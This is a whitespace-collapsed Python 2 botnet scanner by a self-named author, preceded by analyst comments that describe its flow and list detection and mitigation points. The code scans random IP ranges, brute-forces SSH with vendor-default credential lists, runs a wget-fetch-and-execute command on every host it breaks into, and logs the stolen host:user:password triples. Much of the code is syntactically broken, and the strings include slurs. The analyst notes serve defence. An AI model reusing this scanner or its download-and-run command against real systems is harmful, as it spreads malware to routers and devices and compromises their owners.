# NOTE(review): analyst annotations for the listing below. The code is left
# exactly as published: a whitespace-collapsed paste of a Python 2 script
# (print statements, raw_input, StringIO) that its own header calls untested.
#
# What the visible code does:
#   * sshscanner.brutethenload builds random IPv4 addresses under a prefix
#     selected by sys.argv[2] (A/B/C prefixes taken from sys.argv[3], one of
#     the hard-coded prefix lists, or fully random), skips any address that
#     contains a `blacklist` entry, and probes TCP/22 with a 3 second timeout.
#   * For a host that answers, it walks `combolist` (factory-default
#     user:password pairs) through paramiko with AutoAddPolicy, so the remote
#     host key is accepted without verification.
#   * After a login succeeds it echoes a hex-escaped marker and continues only
#     if the marker comes back on stdout -- presumably a check that the
#     session really executes shell commands; the page does not say.
#   * It then runs `command` (fetch a script into /tmp with wget, run it with
#     sh, delete it), sleeps 15 seconds, and appends host:user:password to the
#     file named by sys.argv[4]. The 1.1.1.1 host in `command` looks like a
#     placeholder rather than a real staging server.
#   * f / loadem / mass_check / mass_pwn are a raw-socket variant of the same
#     flow, driven by `userlist` x `passlist` and by ip:user:pass input files,
#     with successful pairs appended to args.output.
#
# Detection points that follow from the above:
#   * a single source cycling through default account names (root, admin,
#     ubnt, pi, vagrant, ...) against sshd with short connect/auth timeouts;
#   * an SSH session whose first command is an `echo` of an escaped marker,
#     followed by a `cd /tmp; wget ...; sh ...; rm -rf ...` chain;
#   * an sshd child process spawning wget and then sh on a file in /tmp that is
#     removed right after it runs.
#
# Mitigation points that follow from the above:
#   * every credential pair in the lists is a vendor or distribution default;
#     devices that still accept one are the only ones this flow can log in to;
#   * key-only SSH authentication, no direct root login, rate limiting of
#     failed logins, and no management port exposed to the internet remove
#     the password-guessing step entirely.
#!/usr/bin/python """ Author: ~B1NARY~ Skype: bl4ck.j3sus XMPP: b1nary@darkness.su Title: ~B1NARY~ PRIVATE BOTNET SCANNER Description: PRIVATE BOTNET SCANNER FROM YOUR OWN ~B1NARY~ Tha GoD Version: 1.0 MADE DATE: 3-30-16 ***THIS HAS NOT BEEN TESTED YET, IT MAY OT MAY NOT WORK*** """ import threading, random, socket, time, sys, re, os, paramiko, StringIO, argparse, random from multiproccessing import Process paramiko.util.log_to_file("/dev/null") #DEFINES command="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh" userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech'] passlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 
'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor'] combolist = ["root:root","root:admin","admin:admin","ubnt:ubnt""root:1234","admin:1234","guest:guest","user:user","test:test","pi:raspberry","vagrant:vagrant"] blacklist = ['127'] randomtext = random.choice('Start Infecting Routerz','Start Spreading Malware', 'Start Adding Them Botz','Make The Bot Count Go Up', 'Start..Nigga You Know What You Need Some Black Jesus','Know We Out Chere!!') thread = threading.Thread parser = argparse.ArgumentParser() args = parser.parse_args() thread_count = args.threadcount bufferz = '' start_time = time.time() host = HOST tn = socket.socket() #BANNER print '\r\n' print '###############################################################################' print '# ___ __________ ____ _______ _____ _______________.___. 
___ #' print '# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #' print '# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #' print '# | | \ | / | \/ | \ | \\____ | #' print '# |______ / |___\____|__ /\____|__ /____|_ // ______| #' print '# \/ \/ \/ \/ \/ #' print '###############################################################################' print 'r\n' raw_input('Press To '+randomtext) #ARGUMENTS parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs") parser.add_argument("-x","--execute",type=str, help="Exucute Wget/tftp from List;[IP+USER+PASS") parser.add_argument("-o","--output",type=str, help="OutputFile Name") parser.add_argument("-l","--load",type=str, help="Scan As Bruting") parser.add_argument("threadcount",type=str, help="# of Threads") #THE CODING BEGINS if args.brute: read_h = open(str(args.brute),'a+') elif args.brute: mass_check(args.brute) if args.load: sshscanner(args.load) elif args.load: brutethenload(args.load) if args.execute: mass_pwn(args.execute) class sshscanner(threading.Thread): global combolist ipclassinfo = sys.argv[2] global ipclassinfo if ipclassinfo == "A": ip1 = sys.argv[3] global ip1 elif ipclassinfo == "B": ip1 = sys.argv[3].split(".")[0] ip2 = sys.argv[3].split(".")[1] global ip1 global ip2 elif ipclassinfo == "C": ips = sys.argv[3].split(".") num=0 for ip in ips: num=num+1 if num == 1: ip1 = ip elif num == 2: ip2 = ip elif num == 3: ip3 = ip global ip1 global ip2 global ip3 def brutethenload(self): while 1: try: while 1: thisipisbad='no' if ipclassinfo == "A": self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "B": self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "C": self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256)) elif ipclassinfo == "BRAZIL": br = 
["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"] self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "SUPER": yeet = ["122","131","161","37","186","187","31","188","201","2","200"] self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY": lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"] self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY2": lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ] self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "GOOD": good = ["113.53","101.108","101.109"] self.host = random.choice(good)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "ALL" allips = 
["113.53","101.108","101.109","152.12","125.11","125.26","125.27","200.62","179.127","186.232","179.106","179.222","179.107","201.75","201.225","161.10","161.18","179.127","187.107","187.102","187.121","179.32","201.221","131.72","131.161","131.255","131.221","186.232","186.207","179.33","186.112","186.113","186.114","186.115","186.116","186.117","186.118","186.119","62.24","78.144","78.145","78.146","78.147","78.148","78.149","78.150","78.151","84.13","89.241","89.242","89.243","92.10","92.11","92.12","92.13","92.14","92.17","92.15","92.18","92.16","92.23","92.24","92.25","92.26","92.27","92.28","92.29","84.43","84.13","195.74","195.12","84.252","84.242","84.144","84.240","178.239","31.164","31.165","188.154","188.155","179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",] self.host = random.choice(allips)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "RAND": self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) else: self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) for badip in blacklist: if badip in self.host: thisipisbad='yes' if thisipisbad=='no': break username='root' password="" port = 22 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((self.host, port)) s.close() ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) dobreak=False for passwd in combolist: if ":n/a" in passwd: password="" else: password=passwd.split(":")[1] if "n/a:" in passwd: username="" else: 
username=passwd.split(":")[0] try: ssh.connect(self.host, port = port, username=username, password=password, timeout=3) dobreak=True break except: pass if True == dobreak: break badserver=True stdin, stdout, stderr = ssh.exec_command("echo '\x67\x61\x79\x66\x67\x74'") output = stdout.read() if "gayfgt" in output: badserver=False if badserver == False: print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port) ssh.exec_command(""+command+"") time.sleep(15) file_h = open(sys.argv[4],'a') file_h.write(self.host+":"+username+":"+password+"\n") file_h.close() ssh.close() except: pass def sock_read_until(tn, criteria, timeout=30): while time.time() - start_time < timeout: bufferz += tn.recv(40960) time.sleep(0.01) if criteria in bufferz: return bufferz raise Exception('sock_read_until \x1b[1;33m timeout \x1b[0m') def mass_check(read_h): try: for line in open(read_h).readlines()) ip_info = line.split(":") e = Thread(target=f, args=(ip_info[0],)) e.start() print threading.active_count() print threading.active_count() > thread_count: pass except KeyboardInterrupt: os.kill(os.getpid(),9) def mass_pwn(targets_file): try: targets_file_h = open(targets_file).readlines() for line in targets_file_h: ip_info = line.split(":") try: e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2])) e.start() except: pass print '[Thread]: ',threading.active_count() while threading.active_count() > thread_cnt: pass except KeyboardInterrupt: os.kill(os.getpid(),9) def loadem(HOST,user,password): try: x = '' tn.connect((HOST,22)) print tn.recv(40960) tn.send(user + "\n") time.sleep(1) print sock_read_until(tn,":",10) tn.send(password + "\n") print "Spraying"+HOST tn.send("sh\n\n") time.sleep(0.01) x += sock_read_until(tn,"#",10) print '[+] Got shell! 
'+HOST if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked') for line in command("\n"): tn.send(line+'\r\n'): x = tn.recv(40960) if '> ' in x: raise Exception try: arch = sock_read_until(tn,"#",3) except: arch = 'ILLEGAL!!!' print arch return arch except: pass def f(ip): ip = ip_rstrip() for user in userlist: for passw in passlist: x= '' try: tn.settimeout(35) tn.connect((ip,22)) except Exception as e: print "\x1b[1;31m[x] Failed: \x1b[0m", ip,e break else: try: x += tn.recv(40960) except: print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e break else: try: time.sleep(0.1) x += tn.recv(40960) sio = StringIO.StringIO(x) try: for i in sio.read(x) if ord(i) == 251: iac_dont_b = 1 elif ord(i) == 253: iac_dont_b = 1 elif iac_wont_b == 1: iac_wont(tn,ord(i)) iac_wont_b = 01 elif iac_dont_b = 1: iac_dont(tn,ord(i)) iac_dont_b = 0 except: print "THATS ILLEGAL!!!" 
tn.send(user + "\r\n") time.sleep(0.01) if 'User Access Verification' in x: raise Exception('cisco dicks') x += tn.recv(409600) tn.send("sh\n\n") time.sleep(0.01) tn.send("shell\n\n") time.sleep(0.01) sock_read_until(tn,"#") tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\n\n") time.sleep(0.01) x += tn.recv(409600) time.sleep(0.01) try: x += sock_read_until(tn,"binfagt") if 'binfagt' not in x: raise Exception('no binfagt') if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x: raise Exception('no prompt') if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked') except: print "[failed execution]",e,ip.rstrip() continue else: file_h = open(args.output,'a+') file_h.write(ip_rstrip() + ":" + user + ":" + passw+'\n') file_h.close() print '\x1b[1;32m[*] Execution on: \x1b[0m ',ip break except Execution as e: continue continue continue continue return for x in range(0,int(sys.argv[1])): try: t = sshscanner() t.start() except: pass self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) for badip in blacklist: if badip in self.host: thisipisbad='yes' if thisipisbad=='no': break